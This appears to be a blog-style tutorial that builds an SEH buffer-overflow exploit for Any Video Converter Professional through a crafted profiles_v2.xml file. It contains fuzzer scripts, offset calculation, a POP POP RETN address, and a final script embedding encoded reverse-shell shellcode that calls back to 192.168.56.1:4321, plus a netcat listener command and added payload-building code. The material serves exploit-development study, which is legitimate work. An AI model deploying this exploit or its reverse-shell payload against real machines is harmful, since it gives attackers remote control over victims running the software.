Saturday, October 06, 2012

SEH Exploit Any Video Converter Professional

First, make a fuzzer. It writes an oversized category name into profiles_v2.xml, the profile file the application loads when it starts.

#!/usr/bin/python
# Write profiles_v2.xml with a 500-byte category name. Byte strings and binary
# mode keep the raw bytes intact on Python 3 (the original was written for Python 2).
namafile="profiles_v2.xml"

junk=b"\x41"*500   # 500 x 'A'

buff=b"<root>\n"
buff=buff + b"<categories>\n"
buff=buff + b"<category name=\""+junk+b"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + b"</categories>\n"
buff=buff + b"<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"wb")
file.write(buff)
print("testing...")
file.close()

The fuzzer feeds 500 'A' bytes into Any Video Converter through the category name. The application crashes, but EIP is not overwritten directly; looking at the SEH chain in the debugger shows that the exception handler record has been overwritten with our buffer.



Then press Shift+F9 to pass the exception to the program. The overwritten handler is called, so EIP now holds a value from our buffer.



- find the offset at which the SEH handler address is overwritten

Create a 500-byte cyclic pattern (Metasploit's pattern_create.rb) and paste it into the fuzzer in place of the A's.

#!/usr/bin/python
# Same generator, with the 500-byte Metasploit pattern as the category name.
namafile="profiles_v2.xml"

junk=b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"

buff=b"<root>\n"
buff=buff + b"<categories>\n"
buff=buff + b"<category name=\""+junk+b"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + b"</categories>\n"
buff=buff + b"<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"wb")
file.write(buff)
print("testing...")
file.close()


Run the fuzzer again, look at the SEH chain, then press Shift+F9. The handler field now holds four bytes of the pattern.



Then feed that value to pattern_offset.rb.


This tells us the SEH handler address sits 332 bytes into the buffer, so the next-SEH pointer (nSEH), which immediately precedes it, is at offset 328. The later scripts therefore use 328 bytes of padding, then 4 bytes for nSEH, then 4 bytes for the handler.
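For readers without the Metasploit scripts to hand, here is an added example (my own code, not from the post) that reproduces what pattern_create.rb and pattern_offset.rb do: it builds the same Aa0Aa1... sequence and locates a value either as the four characters seen in the dump or as the little-endian dword shown in the SEH chain. With the post's 500-byte pattern the handler value 0x316C4130 ("0Al1") maps to offset 332 and the nSEH bytes "k9Al" to 328.

```python
#!/usr/bin/env python3
"""Re-implementation of Metasploit's pattern_create / pattern_offset logic."""
import itertools
import string
import struct


def pattern_create(length):
    """Return the cyclic 'Aa0Aa1Aa2...' pattern truncated to `length` chars.

    Each 3-char unit is <upper><lower><digit>, so any 4-byte window is unique
    for the first 20280 bytes, which is what lets a dword identify an offset.
    """
    units = []
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        units.append(upper + lower + digit)
        if len(units) * 3 >= length:
            break
    return "".join(units)[:length]


def pattern_offset(pattern, value):
    """Find `value` in `pattern` and return its byte offset.

    `value` may be the 4-char substring as it appears in memory, or the 32-bit
    integer the debugger displays (x86 is little-endian, so the dword is
    unpacked with "<I" to recover the original byte order).
    """
    if isinstance(value, int):
        needle = struct.pack("<I", value & 0xFFFFFFFF).decode("ascii")
    else:
        needle = value
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("value %r not found in pattern" % (value,))
    return idx


if __name__ == "__main__":
    pat = pattern_create(500)
    # 0x316C4130 is the SEH handler value that the post's pattern produces
    seh = pattern_offset(pat, 0x316C4130)
    print("SEH handler at offset %d, nSEH at offset %d" % (seh, seh - 4))
```

The nSEH offset is simply the handler offset minus four, because the EXCEPTION_REGISTRATION record on the stack is the next-record pointer followed by the handler pointer.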

- find a stepping stone (a POP POP RETN address)
In the debugger open View --> Executable modules.



Look for a module to use as the stepping stone that is not compiled with SafeSEH and does not set the DllCharacteristics protection flags (ASLR/DEP opt-in), so its addresses are stable and accepted as an exception handler.
To check whether a module was built with SafeSEH and those DllCharacteristics flags, use msfpescan.
I first tried avcres.dll and detoured.dll; neither is compiled with SafeSEH or those flags, but I could not find a POP POP RETN sequence in either, so I tried dvcapture.dll instead.



Next, search for POP, POP, RETN inside this module: double-click dvcapture.dll, then right-click --> Search for --> Sequence of commands, and enter POP r32, POP r32, RETN.


The first match in dvcapture.dll is at 0x100013B4, but that address contains a null byte (\x00), and \x00, \x0a and \x0d cannot appear in this buffer.


So we have to keep searching for a POP POP RETN whose address contains none of \x00, \x0a and \x0d; the one used below is 0x1001E633.




- try to control EIP through the SEH handler

#!/usr/bin/python
# Overwrite nSEH and the SEH handler with marker values to confirm the offsets.
namafile="profiles_v2.xml"
junk=b"\x90" * 328          # padding up to nSEH (offset 328)
coba=b"\xCC\xCC\xCC\xCC"    # nSEH: int3 bytes, a breakpoint fires if execution lands here
coba+=b"\xDD\xCC\xBB\xAA"   # SEH handler: marker 0xAABBCCDD, written little-endian
buff=b"<root>\n"
buff=buff + b"<categories>\n"
buff=buff + b"<category name=\""+junk+coba+b"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + b"</categories>\n"
buff=buff + b"<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(namafile,"wb")
file.write(buff)
print("testing...")
file.close()

The SEH chain now shows our marker 0xAABBCCDD in the handler field, so the offsets are right and we control the handler address.


- next, redirect execution into the stepping stone
Put the POP POP RETN address from dvcapture.dll in the handler field.

#!/usr/bin/python
# Replace the handler marker with the POP POP RETN address found in dvcapture.dll.
namafile="profiles_v2.xml"

junk=b"\x90" * 328          # padding up to nSEH (offset 328)

coba=b"\xCC\xCC\xCC\xCC"    # nSEH: int3 bytes, execution returns here after POP POP RETN
coba+=b"\x33\xE6\x01\x10"   # SEH handler: 0x1001E633, POP POP RETN in dvcapture.dll (little-endian)

buff=b"<root>\n"
buff=buff + b"<categories>\n"
buff=buff + b"<category name=\""+junk+coba+b"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + b"</categories>\n"
buff=buff + b"<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(namafile,"wb")
file.write(buff)
print("testing...")
file.close()

The dvcapture.dll address now sits in the SEH handler. When the exception is passed, the POP POP RETN executes and returns into our nSEH bytes, where the debugger stops on the int3.


- make the payload
There are six bad characters here: 0x00, 0x0a, 0x0d, 0x22 ("), 0x26 (&) and 0x3e (>). The last three are XML syntax characters, since our buffer lives inside an attribute value. If you want to know how to find the bad characters, please visit here.
For the payload I use a reverse shell (win32_reverse): the target connects back to our listener on LHOST 192.168.56.1, port 4321.


Then generate it, encoded with shikata_ga_nai so that the six bad characters are avoided (the comment header in the script below is the generator's output).


Copy the payload into the fuzzer. The nSEH field is now a short jump (EB 06) that hops over its own two padding NOPs and the four-byte handler address, landing in the NOP sled that precedes the shellcode.

#!/usr/bin/python
# Final exploit: padding | nSEH (jmp short +6) | SEH handler (POP POP RETN) | NOP sled | shellcode
namafile="profiles_v2.xml"

junk=b"\x90" * 328          # padding up to nSEH (offset 328)
coba=b"\xeb\x06\x90\x90"    # nSEH: jmp short 6 bytes forward, over the handler address
coba+=b"\x33\xE6\x01\x10"   # SEH handler: 0x1001E633, POP POP RETN in dvcapture.dll
coba+=b"\x90"*16            # NOP sled the short jump lands in

#/* win32_reverse -  EXITFUNC=process LHOST=192.168.56.1 LPORT=4321 Size=314 Encoder=ShikataGaNai http://metasploit.com */

payload=(b"\xda\xd4\x31\xc9\xb8\x2f\x87\x18\x1f\xd9\x74\x24\xf4\xb1\x51\x5e"
b"\x31\x46\x17\x83\xc6\x04\x03\x69\x94\xfa\xea\x89\xf0\x11\x59\x99"
b"\xfc\x19\x9d\xa6\x9f\x6e\x0e\x7c\x44\xfa\x8a\x40\x0f\x80\x11\xc0"
b"\x0e\x96\x91\x7f\x09\xe3\xf9\x5f\x28\x18\x4c\x14\x1e\x55\x4e\xc4"
b"\x6e\xa9\xc8\xb4\x15\xe9\x9f\xc3\xd4\x20\x52\xca\x14\x5f\x99\xf7"
b"\xcc\x84\x4a\x72\x08\x4f\xd5\x58\xd3\xbb\x8c\x2b\xdf\x70\xda\x74"
b"\xfc\x87\x37\x89\xd0\x0c\x4e\xe1\x0c\x0f\x30\x3a\x7d\xf4\xd6\x37"
b"\x3d\x3a\x9c\x07\xce\xb1\xd2\x9b\x63\x4e\x52\xab\x25\x39\xdd\xe5"
b"\xd7\x55\xb1\x06\x31\xc3\x61\x9e\xd6\x3f\xb4\x36\x50\x33\x8a\x99"
b"\xca\x4c\x3a\x4d\x38\x5f\x47\xb6\xee\x5f\x6e\x97\x87\x45\xe9\xa6"
b"\x75\x8d\xf4\xfd\xef\x8c\x07\x2d\x87\x49\xfe\x38\xf5\x3d\xfe\x14"
b"\x55\x91\x53\xcb\x09\x56\x07\xa8\xfe\xa7\x77\x48\x69\x49\x24\xf2"
b"\x3a\xe0\x35\x6f\xd4\x56\xaf\xff\xe2\xc0\x2f\x29\x86\xfe\x9e\x80"
b"\xa8\x2f\x48\x8e\xfa\xfe\x60\x99\xfb\x29\x21\x70\xfb\x06\xae\x9f"
b"\x4a\x21\x66\x08\xb2\xfb\x29\xe2\x18\x51\x35\xda\x32\x31\x2e\xa3"
b"\xf2\xbb\xe7\xac\x2d\x6e\xf7\x82\xb4\xfb\x63\x44\x51\x9f\x06\x01"
b"\x44\x35\x89\x48\xae\x06\xa0\x8d\xda\xd2\x3a\xb3\x2a\x1b\xcf\x99"
b"\xb3\xd9\x1d\x23\x09\xf2\xce\x56\xf4\x32\x5a\xc3\xa2\x2b\xee\xed"
b"\x06\xbd\xf1\x64\x2d\x3d\xdb\xdd\xfa\x93\xb5\xb0\x55\x7e\x37\x63"
b"\x07\x2b\x66\x7c\x77\xbb\x25\x5b\x7d\xf2\x65\xa4\xa8\x60\x75\xa5"
b"\x62\x8a\x59\xd2\xda\x88\xd9\x20\x80\x8f\x08\xfa\xb6\xa0\xdd\x84"
b"\x90\xa3\x6d\x2b\xde\xf2\x6d\x1b")

buff=b"<root>\n"
buff=buff + b"<categories>\n"
buff=buff + b"<category name=\""+junk+coba+payload+b"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
buff=buff + b"</categories>\n"
buff=buff + b"<groups></groups>\n<profiles></profiles>\n</root>\n"
file=open(namafile,"wb")
file.write(buff)
print("testing...")
file.close()

Run the fuzzer to write profiles_v2.xml, then start a listener on the attacker host (the LHOST from the payload) on port 4321:
root@bt:~/anyvideoconverter# nc -lvp 4321

It is now listening on port 4321.

Then start the application. It loads the crafted profile file, the shellcode runs and connects back, and we land directly in a Windows shell.
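The final layout and the bad-character step, as an added example that is my own code rather than the post's script: it computes the nSEH short jump from the sizes of the fields it has to skip, packs the dvcapture.dll address little-endian, screens every byte of the attribute value against the six bad characters listed above, and wraps the result in the same profiles_v2.xml skeleton. The shellcode is a constructed four-byte int3 stand-in (substitute the encoded win32_reverse payload); the function names and the `build_attribute` / `find_badchars` split are my own.

```python
#!/usr/bin/env python3
"""Build the SEH-overwrite layout for profiles_v2.xml and screen it for bad bytes."""
import struct

BADCHARS = bytes([0x00, 0x0a, 0x0d, 0x22, 0x26, 0x3e])  # the six from the post
NSEH_OFFSET = 328        # next-SEH pointer lands here; handler is at 332
PPR_ADDR = 0x1001E633    # POP POP RETN in dvcapture.dll (from the post)


def short_jmp(skip):
    """EB <rel8>: jump forward `skip` bytes past the end of the 2-byte instruction.

    Padded with two NOPs so the nSEH field is exactly 4 bytes wide.
    """
    if not 0 <= skip <= 0x7F:
        raise ValueError("rel8 forward jump must be 0..127")
    return b"\xeb" + bytes([skip]) + b"\x90\x90"


def find_badchars(data, badchars=BADCHARS):
    """Return [(offset, byte)] for every byte of `data` in the bad-char set."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def build_attribute(shellcode, nop_sled=16):
    """junk | nSEH (jmp short) | SEH handler (POP POP RETN) | NOP sled | shellcode

    After POP POP RETN execution resumes at the nSEH field, so the jump there must
    clear its own 2 padding bytes plus the 4-byte handler that follows it.
    """
    junk = b"\x90" * NSEH_OFFSET
    nseh = short_jmp(2 + 4)
    seh = struct.pack("<I", PPR_ADDR)   # little-endian, as the handler field is read
    attr = junk + nseh + seh + b"\x90" * nop_sled + shellcode
    bad = find_badchars(attr)
    if bad:
        raise ValueError("bad characters in buffer at (offset, byte): %r" % bad)
    return attr


def build_xml(attribute):
    """Wrap the attribute bytes in the profiles_v2.xml skeleton the post uses."""
    return (b"<root>\n<categories>\n"
            b'<category name="' + attribute +
            b'" id="0" icon="cat_all.bmp" desc="All Profiles"/>\n'
            b"</categories>\n<groups></groups>\n<profiles></profiles>\n</root>\n")


def write_profile(path, shellcode):
    """Write the crafted profile file and return the number of bytes written."""
    data = build_xml(build_attribute(shellcode))
    with open(path, "wb") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    # constructed stand-in for the encoded shellcode: four int3 breakpoints
    print("wrote %d bytes" % write_profile("profiles_v2.xml", b"\xcc" * 4))
```

Because the screen runs over the whole attribute rather than only the shellcode, it also catches a stepping-stone address or jump encoding that happens to contain a forbidden byte, which is exactly the problem the first POP POP RETN hit at 0x100013B4 had.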



Alhamdulillah ... :D
